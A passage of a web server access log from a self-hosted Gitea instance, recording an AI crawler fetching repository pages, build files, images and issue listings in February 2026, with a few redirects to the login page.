(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 150852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2f.vscode" [Client 74.7.227.38] [Length 18536] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" -[17/Feb/2026:17:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:17:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 9816] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:17:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" [Client 74.7.227.38] [Length 9804] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:17:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:17:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13917] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13889] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10118] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fbuild.make" [Client 74.7.227.38] [Length 28454] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:17:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fdepend.make" [Client 74.7.227.38] [Length 24741] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:17:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fDependInfo.cmake" [Client 74.7.227.38] [Length 25908] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fprogress.make" [Client 74.7.227.38] [Length 24843] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:17:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 23682] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17360] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21433] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/Gitea_Manual.md" -[17/Feb/2026:17:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:17:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13226] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-next-todo.md" -[17/Feb/2026:17:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13226] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" -[17/Feb/2026:17:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py?display=source" [Client 74.7.227.38] [Length 13192] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:17:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" -[17/Feb/2026:17:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 11758] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19506] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19504] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19506] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15629] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:17:33:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" -[17/Feb/2026:17:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] 